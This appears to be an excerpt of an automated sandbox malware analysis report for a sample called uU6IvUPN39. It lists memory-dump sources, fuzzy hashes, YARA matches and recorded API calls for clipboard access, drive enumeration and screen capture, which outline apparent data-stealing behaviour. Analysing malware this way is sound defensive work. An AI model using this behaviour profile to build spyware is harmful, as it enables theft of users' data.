                                                                        • Instruction ID: fdd1ed88eb7c8cd9397f1caeae76fbbd09d6961d5ffd4c31d25f73868b30e69f
                                                                        • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                        • Instruction Fuzzy Hash: 31D097309883A00E47288E3810A083BFBE4EA43012B08108EE0C5EB204D320EC028658
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                        • Instruction ID: 8c6602917fdb956e33e5ed0c062c44bb8739f147fa9184780212f41d8b26cb24
                                                                        • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                        • Instruction Fuzzy Hash: 50C04C69E6C4008B924CCB15AC5153266769B8B254715E03A841663255E234945B950D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                        • Instruction ID: d0129799e4f617702e88ee2317aa38f8b48fef163125b91d736ab0f86673d222
                                                                        • Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
                                                                        • Instruction Fuzzy Hash: CCC04C69A6C4008A924DCB15AC5053162779B8B254715E029802A53256E2249457C94D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                        • Instruction ID: d46756a0e1fb04911aea311e00f3b6d6bbb29cfd6f8012ad29779e734c60ec08
                                                                        • Opcode Fuzzy Hash: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
                                                                        • Instruction Fuzzy Hash: D7B002749493418BD380CF18D545726F6F0B747615F142919A054F3151D374D9488A5E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                        • Instruction ID: c018d795f0dc3322a67de82126959776e6cc80093cc23c5047751edba26d1c35
                                                                        • Opcode Fuzzy Hash: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
                                                                        • Instruction Fuzzy Hash: BC900224D49100CA81408F45A480570E278630B10DF1534109008F3011C210D404450C
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                        • String ID: @$B$C$E$F$K$N$O$t${$}
                                                                        • API String ID: 2832541153-984153585
                                                                        • Opcode ID: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                        • Instruction ID: 5ee23a0c359e8ddfe095cbec1a048b9d5c3dd93a64b71baa574002b0fb198455
                                                                        • Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
                                                                        • Instruction Fuzzy Hash: 60414A7050C3818ED311AF78948832FBFE5AB92318F05096DE4D986292D7BDC548CBA7
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: DrivesLogical
                                                                        • String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
                                                                        • API String ID: 999431828-351939610
                                                                        • Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                        • Instruction ID: c0a169318dafa95590f7cd8ccb1fcaba164b2d5b4a16e24b7cbb018ab237c84d
                                                                        • Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
                                                                        • Instruction Fuzzy Hash: 1A31D8B4149394CFC7108F29C85122BBBF2EFC1314F40989CE9A64B620E7799946CB42
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 02166BF0
                                                                        • GetCurrentObject.GDI32(00000000,00000007), ref: 02166C11
                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 02166C21
                                                                        • DeleteObject.GDI32(00000000), ref: 02166C28
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 02166C37
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02166C42
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 02166C4E
                                                                        • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 02166C71
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
                                                                        • String ID:
                                                                        • API String ID: 2843486406-0
                                                                        • Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                        • Instruction ID: 8d62712f38045fc901453711abe17184cb0d5f35dfdce6053bd34ca197465ac6
                                                                        • Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
                                                                        • Instruction Fuzzy Hash: CF214FB9544310EFE3509F609C49B2B7BF9EB8AB11F014929FA59A2290D77498048B67
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 02155411
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID: +$e$+$e$XY$E#G
                                                                        • API String ID: 237503144-1023387988
                                                                        • Opcode ID: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                        • Instruction ID: 0a736a2bf64f23d542f1399e9861002a2214d1f14811e1577c7661baee8e0e6a
                                                                        • Opcode Fuzzy Hash: 796cc6ccac140472a8104463ef7e640a249bdffaa71f860e68154a69d4d8fa0c
                                                                        • Instruction Fuzzy Hash: C421063424C354AFE3148F65E88175FBBE1EBC6714F25C92CE5A85B282D775C80A8F86
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000,?), ref: 02155B5B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539549867.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2130000_uU6IvUPN39.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID: B"@$`J/H$rp
                                                                        • API String ID: 237503144-3817236508
                                                                        • Opcode ID: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                        • Instruction ID: 1ad4d5ae16f33d5edd64740f372be2fdb3c53aac93ecd308c988fb5498167533
                                                                        • Opcode Fuzzy Hash: d1879db7092e8caf361d2fa4e2e19fcb9f3d80e285b1dd23349b8ef0ea2aa233
                                                                        • Instruction Fuzzy Hash: 7C31CDB0E443589FDB10CFA9D8827DEBBB2EF45700F50002CE451BB295D6B55906CFA9
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID: aN@$Wu
                                                                        • API String ID: 3664257935-2510175649
                                                                        • Opcode ID: 6923c55db78119380e5fe35a3321c238481177c04641367e3fdf37507d6e1cbb
                                                                        • Instruction ID: fb7b49653fcfe6187a11668ca7033b53e8d7d933bb39412ee55706a61e0bd157
                                                                        • Opcode Fuzzy Hash: 6923c55db78119380e5fe35a3321c238481177c04641367e3fdf37507d6e1cbb
                                                                        • Instruction Fuzzy Hash: 5951777460C3C08BE3358B299C557ABBFE29FE2308F48096DE0D95B3D2DA74440AC75A
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1539139927.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1539139927.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_uU6IvUPN39.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID: Wu
                                                                        • API String ID: 3664257935-4083010176
                                                                        • Opcode ID: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
                                                                        • Instruction ID: 76f8199259777ce60f51c6d99c718f1815bb22ab62b72bec75753df54c08d8dc
                                                                        • Opcode Fuzzy Hash: 880272bc0811b14ab5181b2bf88990afbeca93da92f698920aa63cdcc06e2724
                                                                        • Instruction Fuzzy Hash: E2C0023B8620009BDE857FA0FD898187A31FB4A30531C44B4B80140036DAA20960AA59